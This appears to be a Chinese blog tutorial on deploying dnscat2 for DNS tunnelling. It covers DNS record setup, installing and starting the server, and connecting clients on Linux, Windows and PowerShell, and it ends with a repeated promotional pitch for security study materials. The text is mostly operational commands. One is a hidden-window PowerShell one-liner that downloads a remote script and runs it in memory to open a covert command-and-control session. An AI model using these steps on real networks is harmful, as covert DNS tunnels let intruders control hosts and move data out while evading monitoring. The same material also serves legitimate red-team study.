1 服务器端环境部署
1.1 部署域名解析
如果要通过域名的方式访问那么久必须部署域名解析,直连方式则跳过此步骤。
1.1.1 创建A记录
创建一个A记录,ns1.xxx.xxx指向vps ip地址。
查看是否生效:
1.1.2 创建NS记录
创建一个NS记录dnstunnel.xxx.xxx指向ns1.xxx.xxx。
1.2 安装dnscat2服务器
在vps部署dnscat2服务器:
apt-get install gem ruby-dev libpq-dev ruby-bundler git -y
# 安装相关依赖
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
gem install bundler
bundle install
# 安装dnscat2
1.3 启动服务器
有两种方式,一直是通过域名访问方式。另一种为直连方式,即直接访问ip。
1.3.1 域名连接方式
ruby dnscat2.rb dnstunnel.xxx.xxx -e open -c aa8j --no-cache
-e :规定安全级别。open表示允许客户端不加密。
-c :连接密码
--no-cache :禁止缓存
1.3.2 直连方式
ruby dnscat2.rb --dns server=127.0.0.1,port=53,type=TXT --script=aa8j
port :指定vps侦听端口
script :指定连接密码
2 客户端部署
2.1 安装dnscat2客户端
如果是Linux:
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make
如果是windows:
下载链接:https://downloads.skullsecurity.org/dnscat2/
2.2 连接服务器
2.2.1 访问测试及错误处理
首先测试是否能成功访问:
./dnscat --ping dnstunnel.xxx.xxx
注意,如果遇到如以下[[ ERROR ]] :: DNS: RCODE_SERVER_FAILURE的情况:
先尝试清空dns缓存或更换dns服务器等方式,让nslookup域名解析到正确地址:
nslookup ns1.xxx.xxx
2.2.2 域名连接方式
Linux下:
./dnscat --dns domain=dnstunnel.xxx.xxx --secret aa8j
看到返回Session established!
字样代表成功创建了session。
此时来到服务器上,也会看到成功创建的session号为1:
windows下同理:
2.2.3 直连方式
./dnscat --dns server=<vps_ip_address>,port=53,type=TXT --secret=aa8j
效果一样,不再演示。
2.2.4 powershell连接
在windows下还可以使用powershell连接,脚本下载地址:https://github.com/AA8j/SecTools/tree/main/dnscat2
方式一:导入方式
Import-Module .\dnscat2.ps1
start-Dnscat2 -Domain dnstunnel.xxx.xxx -DNSServer 8.8.8.8
方式二:内存加载方式
powershell.exe -nop -w hidden-c {IEX(New-Object System.Net.Webclient).Downloading('https://raw.githubusercontent.com/AA8j/SecTools/main/dnscat2/dnscat2.ps1');Start-Dnscat2 -Domain dnstunnel.xxx.xxx -DNSServer 8.8.8.8}
## 最后
**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**
**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/79e53b09f33186e09543173837b02b5b.png)
![img](https://img-blog.csdnimg.cn/img_convert/d020b940fd561b4c7cb0b843ee018c20.png)
![img](https://img-blog.csdnimg.cn/img_convert/efcaca303e63935efac0581e913c6c37.png)
![img](https://img-blog.csdnimg.cn/img_convert/a0d19d29bbd8ada6151c0d864774f43d.png)
![img](https://img-blog.csdnimg.cn/img_convert/6561ba3c554b2d744c660566385de505.png)
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**